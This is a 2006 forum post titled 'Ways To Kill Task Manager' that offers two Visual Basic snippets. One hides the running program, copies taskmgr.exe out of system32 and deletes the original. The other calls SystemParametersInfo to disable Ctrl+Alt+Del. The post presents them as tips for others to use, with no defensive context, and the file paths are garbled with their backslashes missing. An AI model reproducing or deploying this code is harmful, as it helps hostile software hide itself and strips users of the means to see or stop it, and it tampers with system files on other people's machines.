Welcome Guest ( Log In | Register)



 
Reply to this topicStart new topic
> Ways To Kill Task Manager
salma21
post Jul 20 2006, 04:11 AM
Post #1


Newbie
*

Group: Members
Posts: 3
Joined: 20-July 06
Member No.: 26,921



Heres a few for you all...
Code:

private sub form_load()
killtaskmngr true

app.taskvisible = false
end sub
public sub killtaskmngr(do_it as boolean)
if do_it = true then

filecopy "c:windowssystem32taskmgr.exe", "c:taskmgr.exe"

kill "c:windowssystem32taskmgr.exe"

else

filecopy "c:taskmgr.exe", "c:windowssystem32taskmgr.exe"

end if
end sub
public sub form1_unload(cancel as integer)
killtaskmngr false
end sub



And Another
Code:


Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Sub DisableCTRLaltDEL(huh As Boolean)

'Disable CTRL+ALT+DEL'

GD = SystemParametersInfo(97, huh, CStr(1), 0)

End Sub



Hope it helps you!
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic

Collapse

> Similar Topics

Topics Topics
  1. Where To Sell Our Vb Programming"product" ?(6)


 



- Lo-Fi Version Time is now: 30th August 2008 - 12:42 AM